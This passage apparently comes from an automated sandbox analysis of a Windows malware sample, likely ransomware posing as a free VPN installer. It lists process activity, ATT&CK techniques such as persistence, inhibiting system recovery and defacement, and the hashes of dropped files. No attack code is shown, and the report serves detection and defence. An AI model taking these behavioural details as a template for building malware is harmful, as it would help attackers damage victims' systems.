- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
    3⤵
    PID:3560
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3728

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5924

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:792

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4048

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39d3055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Free VPN\freevpn.exe

Filesize
427KB

MD5
dabc37a14650aae67c44f9c131299f62

SHA1
2a90a973b5f0797d2b860596c122c31da82a4eba

SHA256
95031bdba502a9bc8a9181cb5589cccca28b29a739236b2ca30eb31955e08378

SHA512
5e4bb1f9368d3169dfa69d2effb1f045665f82f221fbdbf6d60b0cff3a1902dd6e537cd7893746a2a119014c36cc0c769a19126d6d8eceb9e2321c32ddc8b2c4

Download Submit
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
585B

MD5
7e454c7bc30e036e11da682ced6befbd

SHA1
5c25df87347923b7caa7a8bc86c9fcf79f894cc5

SHA256
2f8b05154268827903f41d3efbe1b68abe6449bf6c8456a10a20b4ca9f5c1741

SHA512
702d4c779e2775f44b7ae3feb2506f4619c68bf65950f50cc967e7e3c32ebf865f3694f7f9b23f776e89ec45197104aea7117f537b72d8a83f5ea5fa29292a1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
a06e408acb97503ac9fc23013cf06818

SHA1
d8b0a575b9fb78467e1720fb73966e5d27ea76d6

SHA256
904c2daff22551fb527593988f2f29bbc75b76111c0a6c6676397c37a0c8784f

SHA512
42b0ceb6b684621ab6be369ac274d11679b16aae5fc6a49838f3a5e20a072d87034d48093cbc6bda4ef32914d338d0c82450965749ccbe095a7ac3163457c2ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
210KB

MD5
48d2860dd3168b6f06a4f27c6791bcaa

SHA1
f5f803efed91cd45a36c3d6acdffaaf0e863bf8c

SHA256
04d7bf7a6586ef00516bdb3f7b96c65e0b9c6b940f4b145121ed00f6116bbb77

SHA512
172da615b5b97a0c17f80ddd8d7406e278cd26afd1eb45a052cde0cb55b92febe49773b1e02cf9e9adca2f34abbaa6d7b83eaad4e08c828ef4bf26f23b95584e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
273160526fa465b427d2155e486fc73d

SHA1
176bd2f67fb051fe71010362e174dc5f4b5b0fda

SHA256
ad7c666d8f8779637e042c5ba1d398831b4ce14fdbad2eee3db070c4a3a23fa3

SHA512
90aaf964d64f0629e0a71b438e46d4f6936602cd765dc2f27a7462a156fd052265403b84dea54da94f42b7b51f7c650484b06545efd0b0d48cf1b6cb63432486

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
e36044175ab82357f3710cc686ed6a48

SHA1
e59903c7200b0003ad67a24dc2debb0fe22291cf

SHA256
5293e4c38a92ca1aea10530a78a3757b3a7879ca20d3065c6bcc7cdfa2e5a76f

SHA512
ec7db94f07adc2919e2d20c47eabfb9d560f98c763747049c33f35900eb226f2e464d1b47d08aef5fc3529ddea74f7c095640383e23849695655bb2a21fd6bbf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
352B

MD5
60f9e8d3a67dacada5850fbbd8ce3995

SHA1
1a3b2e043d6d359d93367aeeafcd55727dce1b87

SHA256
3f61334d82c1a79c98cc3cdfac8934a92dcdcb3801830c750bb0ff6c1b984738

SHA512
b0de2b593740a9be2d2ade7de5e442f09da03a586f93cc769fe7cd0a6e4a0bbfaaafcc076f139d5243e8c3258e41c686558330036b9d20d140a81c4bb88abb50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
352B

MD5
4d86a36ae497179ba5de0ba5735faceb

SHA1
2fc990d4fc1608b38c78a27bcd5e433165a9d84a

SHA256
2e2254fccf3db817d583e5cf1118cec4356ec3bc80cdb3d5861e3fc1dc2f5bf6

SHA512
691fa3e2d44c5f2dce9e8429c58c3dc517720ad1f60d49afa6c0347e94c7f935386825efd8b49d3ae08ca6a83ae9bf070d3b6809aa9cb275d11108eac079f203

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f701d5b15938cb8900cfb89248dda81f

SHA1
b323c0d71127f94328ebb0bcb0b7f0bf0928a66d

SHA256
e6fdd5bffb56341c6b3efaf1d7f54df515c1656f46ad710b698eaabc23a53c73

SHA512
d0bf52718154e8176abbb0cc038128c178c37543dd9b38e245081fa3462c4fcf5e2b57dde39845e492b707f9df81dc74cadf34c046adf51e93cd1125075cacc8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
e3d2fbbb2d44b3a24deb89e13fa2761d

SHA1
7479d64b284526a94bf70f82cd50a7e68396f983

SHA256
4e2df8c587655570884636a8131ea3b3647f449789cc3ebc09af03d2d0c5fd26

SHA512
93d04933c630ee7b4b6fb11dbd411edbeeb6ec2de47bef1147118c7fc237ce0181c5dc6367cec3c0fc95aa27734d42d1066353b8481dd3e5910f051d4ce4460a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
cde182fd278306c3787e9174c6e57208

SHA1
ebbc9bde93859d2f7a21fe91af7a5a3e0b78e711

SHA256
7f1051a1f75fffc96080d62713f7b524b74ecb06c154b224204e17fdbdb1a24f

SHA512
3142e8524c365febe1f284dad96f8e00d5b74599eb0866340867f3b699da2f535675c5c721259ca05ab7b3e944da870423955c6de12a5dd3efee71b1095e3263

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
193KB

MD5
0024d1719312dc2ad679d6a85ea3f917

SHA1
93921f875b2c5d990b111486249f2de78fde9ef1

SHA256
b1c0b04a16cb70c6e8d25b887f7c9b30c880d50515768fdca6348ba6d0685e9e

SHA512
f2ae90514cc5b050be881cb852452269a2cf38be9c9ec4613fa8151173b05a3dd73e9456e68c1dbd930b7acd3731d422fc2c1e58612f6954945f239dd16fdaa8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
193KB

MD5
dadd03581372be94340367d859089d80

SHA1
aab378d447e6cfd640f4ba300a4edcc520bf3e40

SHA256
c407fb9ed780ec6bd6d8034b8f6142cac17badad84e807f3714f5e092d1e4aae

SHA512
750de893d10ff03a5a5b7c2ee378d0aa14aed980482282ff9ecb85622ea917646ce193ec4001805b6fb1181490cfff810345e1479141a8eb74b2671cf3cc27ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
33283e35e23033332d4a139e2f65d375

SHA1
15329faa7f816fbbdf558ec9bb7d47d09f0e72e1

SHA256
49d57921366b017b08bc13942d5d3f0f146167cae92058fd13289b8df1cddfc4

SHA512
36b620c0813445358143c54bb06da8dd933b8e61104fb34cb9b5f03a6c9133a195e4fca6ade1b79ed93c62fb3439f4fd5df40bae8e9aa4c8fde72e17a03079c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cc2429a9fdf1ff1b068b456a6f9edb5a

SHA1
ccd3f60cc81c69bc5edad4d618e10e601d492802

SHA256
89b660e0941a7b9f25b7be9bd3e77d35b2121f6d0b940d46851b8ebc5918826e

SHA512
8ad8c90e98833f9bab7efda39f0e3c343fbd36aba8c54c53a722e88ab8c79a6b12971171ee42332552b107e84bcac1342d609b389f8d34d06264b2a73015a9ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6fdbe80e9fe20761b59e8f32398f4b14

SHA1
049b1f0c6fc4e93a4ba6b3c992f1d6cecf3ada1f

SHA256
b7f0d9ece2307bdc4f05a2d814c947451b007067ff8af977f77f06c3d5706942

SHA512
cf25c7fd0d6eccc46e7b58949c16d17ebeefb7edd6c76aa62f7ab5da52d1c6fc88bde620be40396d336789bd0d62b2162209a947d7ab69389e8c03682e880234

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9828ffacf3deee7f4c1300366ec22fab

SHA1
9aff54b57502b0fc2be1b0b4b3380256fb785602

SHA256
a3d21f0fb6563a5c9d0f7a6e9c125ec3faaa86ff43f37cb85a8778abc87950f7

SHA512
2e73ea4d2fcd7c8d52487816110f5f4a808ed636ae87dd119702d1cd1ae315cbb25c8094a9dddf18f07472b4deaed3e7e26c9b499334b26bdb70d4fa7f84168d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c021e5f-3af0-4e9b-b171-58574060a5ea.tmp

Filesize
5KB

MD5
cfbb79925f3150fd0fdd7309e9cdef10

SHA1
557cdd5473765adeccc834a7918dc4baaf306d18

SHA256
98d3afefaf5cd4b57577631d0540a314355eb7dd67dc879390f4b7b442ceb827

SHA512
1cf8dd311c565fe5a382464c17ff490a9d57339d117d86bc6ff36b7c9b0df30d4bb4d6e38957120d082e2fbee1d6b9cbaa409590ec3188db3d19387f4ac7971f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5d469c13-b219-458d-b8b7-830e3565d006.tmp

Filesize
2KB

MD5
e810fc572030efe1ebcfc987d1077c2a

SHA1
6e7a0e3c838338c84275bca7030772a0f70f0406

SHA256
fb7a9b8c8969f34ce62f5c31f266d182c9294ae94b6104749ea90cc42133f571

SHA512
7f7d34bd444063eaa1a9e945415db757a124aa4bbc383aa6df11a58b94c48433f56bc7b4d308e13492a80a7b62c8ad8f657f186ff1f358a9e68072730142e34f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
cbc363e04e889f6f53d96c95a70f1477

SHA1
3bc07defa5d5a23ad80c20b3bd9ae2583e9f3066

SHA256
0b2f1186567cf2ee941e5f3ba2ee852052594aa5b35143be4f24c9308b13ab34

SHA512
e0a9d53008b6a4e7408eb73cc26dc7bac6b3c313aa163fa94503a0b448bb1cc9d8042c443bd069ea933d71d58773d091711a9e228df69c3b5108854536e6f42b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
052cef1509c4e1575766bd56f9e5af80

SHA1
aaa73a6e91ddbe22bc2ae7c17f9436b62bc614b4

SHA256
cd1b97a290af88e4117c0dda82406c31861b482e9f46b17893348b17cd91dc3c

SHA512
eab495714b605e41d8410db3b19f21cb717a937032708d8c3433d9018061af3d65beff6f229d2a47b6a5397d3579a879b8b90bf6628b7c0eaef148539dca2f97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
4c4506e1cd2322f2142e4f6fa0263c3c

SHA1
d211e38a52d973a0020cf0e3d9742104364eafad

SHA256
9085860a7cb0407488c95ed24c22e7876f4fa75dc2a40c9005f988761b113ea4

SHA512
6f7cae7ba5ae01325ceccfb2db6c80f3ec6beb4faae325b7f85cee158aae9efe62008f87549b913d09cd32a82aa0b45ed7ebd484978cf0812bae3111feec941d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
cfc3daf895ec888f52f3f5aa896f38b0

SHA1
311bdc8d0d90fd44ba0f05e613e008eeba914cc2

SHA256
dadee2751dffb9c7a26d1e10be392b6df8d1606b4c7b78dab2961246afc19dfd

SHA512
6ed04097d2bb4e91b0c78675c00db0fa6cb8ba2ef82d787330ecb2233c7067492e8e787ca6d64bd4346e0a5a416f9de3fdfce28ebbf35bf77e22675725cff43a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
643B

MD5
4a50d3332b0dae3ce81745b53f3f568b

SHA1
c8086052892e8fd6c8e7b73c7b55c400d685211f

SHA256
ab770dcc48d0e7eee43220ce32fb6f738e7ece124188d1ac9fefc8c48c42ed70

SHA512
1bd5919369d406a29f0b7cafbf210b6739ef428a393ae25116e0db966da6987732a024af7326bd8a491cf88655cc64f4dc478a392ea82c20830eb4d620fc6954

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
ff4b4733c9fee3858fd3e45869081294

SHA1
55aea8e312a4d61f7cd5066115a580263919d819

SHA256
6c99654067a0c859b3ecfae33db0286821ee1a639bcba5e41b5708c354696da9

SHA512
b186ebc3b738ffb5d19a45869754c1f28751e13f4ff2114cac9abf8dfee6abb258187c45b0fb45f16facfd511d4fcccb24b1f6eb70e4e2afa2f030cf403208c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
945B

MD5
1eb32df10068b48456415f5a0bc485c4

SHA1
2550131f93daa0c50b67c5a1999a3dca2aeb0c64

SHA256
3c6e24d6cf86d7587b8b8e983946713226d509618f20c336855d342cdddb0d6e

SHA512
a748a0454ce4384a0339ffc03f4885ec344f2a9adfa501fcd477c18bd1d2be4613dbfb8c70924611051b78b924df6f9364cfe19bb7ff5fe11cd7a2299c60f4fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
793B

MD5
f6d3d96e214ad2c89dc140ff094afd22

SHA1
0ea8f6b16809d044670cacf4ed8bb67bf782cbbd

SHA256
03d21e2d8b53cf47125ac53c7df3dcc4c07aabd18782532027bd431b3d4ee6cd

SHA512
4d6c4f2881415e474120461fe846a58e29464e8084b41927aeb351b33cea6a9af2a6690cd0676a517928033fb473778bd96081d9bf35b5c312fc186b833f74f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
4fb44671c76b5b93830716cd3316dfed

SHA1
309b0a20f20716d6a04dfb96ca9a748c2d4fd5a4

SHA256
29793410ed38ae5796d0fab8afdf2d55d5ad3e436b66ff5a0a576b6fb0b008f9

SHA512
2c34d6abb49226386a92eadd41bc8ad5686a3b0667078cbe00140867561c8459c1005d152d5ff04e6fe89450a9aa840cff58ad0387900d88c84f28aeba0e5879

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
70607e0cd9ddb03b91c899203b642019

SHA1
7be6412a39b427c204c1722db0547d8457715077

SHA256
693155c5f92925be15478b7e905efd0d9e962db3f958092b23df65aaa2ee60c8

SHA512
002abc9d9dbd437c375989162acb50b913adc88f7493a35fcd3a8ff4db7ef433da83a755b62fb2bcefb332389386cd232291bfb2acd1b70396da05c6c97cfb7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
4d5bbbad63ebb276d32de5c62107404f

SHA1
6c4a6b3da4075ae4d4d7e20bc24b3158cd1f30cf

SHA256
1609358ffc0b461b146b6d87aa2c1ff72505bb9089a92bb2f54bd442d945e742

SHA512
96dc56e7dd6ea453eea3af1d4c6f572fee581a0ebcf5c25486d6051995c77840bcce3c154ab5793583314213add1a4e5f7d1ada745ac860d7bcab104c0d36879

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6a445e181a381e3eab55fa629ee65428

SHA1
a69eb786ba949928649d3f3bd80d4682e1b08066

SHA256
bf96315042be885ef3de89bc25a75b5c70b8f2a4fb987ab2b699511ba74486a5

SHA512
57e963fcc227ee13220da1038d84f4b9a3edce10993bbf278b81499e9846b1ee9c4f5a6b47dcf52ef1a2c8abda05b47f7b2fb2596f5eb9335e012c4c88029124

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
b1ac5e88b08b79502bcfea04a62920a7

SHA1
2d4109d9ada1462625645cf845e475eccc2aa306

SHA256
badbbb158c78fd038c1e67ff4d3edba822af53401263a48f7bee9c1e0a36d0bf

SHA512
8f1a07677457dba649b51328c8d55788ce7f8bdcd1f526d38c01daae6f9c028cfd7c924cdda9d8a448f17b4c4d5db1d909b6ed4f32458df9b0b555bde261e19f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
470173c2770b743c9b189e84a829ae77

SHA1
41391dd17939089919545c8b58499f4c371fbfdc

SHA256
796ad8afb0b4c91d3798ce2bb9b14744c75275cad8af03407e7f780fd65492d2

SHA512
a148078b852c2668ece81723d5d81310e6b736baffe7875d2cb2f8f253c5b302aaec7fa9de767d9c56bd6a286e4f6086851459dca0e60e95a4ca9c7028b92e4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8c04c009a0296f40c96b860475969ec4

SHA1
e8e93e1280267a4d35aa317fe78c1a4b96975826

SHA256
2ca80648a32a117aff0dfbe4ea550afda20e89693c4724898bfd905788fd9345

SHA512
5552295fd7b3564cb447e20dbda9d391baced8f0f5d61d94283215a38120a0e31bbccd9eea5a1ea1d439867784aeb948e5e710995ead427d34ffb8b143fae7c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
32ee2f95a6f17f70ef654a776bbf3607

SHA1
092b047827f9af2431b12a6295c3d8e10654af7d

SHA256
bb2306e5095d364ea5e9d8fe15dbaa998782292307f295a78cc406b2e4fed6dd

SHA512
ccc1cc12215e8f16d1fe4e5374a808b34469345034f5457227f010a5c4ab8f6a49cc9df31981c59c4f97e2d85cad431b93314fcf4bc2ece9823f12d88bcedd08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
daeb1661199900e6eed68f8da7a95f47

SHA1
d62dcc3b352991bd425cbf5ae857ea838ca46aaa

SHA256
8920f295fd294a03abcbfb915b7a7085ae793e363f0c2ea08a4a92fb4353f565

SHA512
8e22551f14dcf0fc3abea6df21dfd0fe369a96c3ef96af1cf5ab480698f4dae9b6ff83143df8d67aaacb0eaa4d8f5959863f0039f701fcb7f2ca24a473ac4e06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
5a7bf9241ab1a09943f4580ec35be17c

SHA1
4ccaf0e761eca93de5f5c32d299fab03919af63a

SHA256
035d40c43ac54d8368d06884826bc69239375dc6803bf0432e744bf3396310f3

SHA512
55369a5e62d5d6fb8860aba57baf1580d5b9f8dba3b5bde54ec58834d517d8e3cdfbc82101036210c5cc5c3723491435340378712faa07a79488318f04a7fd51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c9cf926040960508527bc9f197615f5b

SHA1
fdaac05599597ad12a7e21d7e4b30b9a9e0c9092

SHA256
40e66948c508456af14be52204975e85851001ccbf0aca6977691102369c48f6

SHA512
ff71065740397ad478ebdde0123a20a7fd4684e64540b77568330d54eb39b01c2dbee72c125c4103ed7b6562eb6a80d31f2c0801d8c00cf6cb2e3e059b7795c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
369fa8bb690ed940f0383bc5fb9abf38

SHA1
fb23c4c55611800dbddb6f0fb8833ecaee099945

SHA256
281c6e09f8d98da6f924fce69eafcc44dcacdb7056cc83435cd991eb659d2720

SHA512
2fe0eb110ad7593a4f5de9a4458745faa62b06bfa707c3f7992b9331f56b2cdb99ace04399075c6a78e7390563667fb706a9c17d494aacba368e5887d05c4548

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
0222d346370b70e4c703acbdfe6e1020

SHA1
c64e259a590c047ca3c1500ca338df9c92426d7e

SHA256
0446e099d604bd0d689d434495983cdd0a3d7ffec468e4742389bf25d64cf121

SHA512
826675f090b67aa62495cbe6997210cd0e626f6852eae3cefdd756cab22ffb4c588396173d0a9ac01167b40e95de1300e1fbed126b4f94fe9cb194bf5deca8b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ef3e93159bb159950f428debcc3f61fa

SHA1
2bc8d56db4322245198eb724841f215d725e9349

SHA256
a818c642e4329479625ba8adac7bdbba9ddeca5b3abae356b54c3b8ffa666127

SHA512
edb78514d9384175877cc205bfcba6af0b7adc979accef6eac97691817ce0ed035da847ba724c7e6216b882e79a546fc552777edcf148898d676323a572efa6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58af08.TMP

Filesize
866B

MD5
8588839e017083c08a3973b54ee85c96

SHA1
5af62333cd35b528420c8a4bf02586efaed1e75c

SHA256
570ac83ed63b048c5dcd8b1c55abc89031d4e3f66f93cbd516c223266a37bdb5

SHA512
3850d800c5ca87b08f8e8e9aeae3ce8c446a3dbd45fd93bc68e80cff3b64ed92b1774997d5e7ecd0f1c673ff77ca112df329e33fbf58e36af744038c3fe8c6cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f6ad95c3-8c2e-4857-8e3f-e7a37f6e6bd8.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
dbf7cc00cf850f01df7eed6b11033f9b

SHA1
a38886322a97559fef022f72d36e4566105a0f34

SHA256
8bd966555e88af40c4945a1fc5f7ce3c2ff3f9ee86be3ddd574219d096659584

SHA512
3f66dede7e9e29b84e08a6a23d8822f3cdca4d486bb5b4f6bed675cb00445b28bee138b947fe1e73c472f5b3c50182dc4f8a5b2611e29f27efaf41a71cf83b39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
dbfc4f4530b4112663e146d3a1e6e429

SHA1
87b9cc2f43166dce18e7be1c9282c63a02030008

SHA256
1898647626cf547ff5bf7bdad4db7762a806bf2384e5f99b9e3714543bd098c8

SHA512
98149e859f31ba31ce048d3b96af9d4ce8506c289ffb2d71222c616d833705365069e3281ca26eb767f8c82fbd05f2957b7d42d4ef99a767fed6c74355cda57e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
359f571d4b20bf19f19d8a83abf25aff

SHA1
02efda8ee763d807ce7ec055def8ef74dac392a9

SHA256
8f76084a571f747da365b387b48cfe98f53bff08a26b6c97fac63ee3752ac5d1
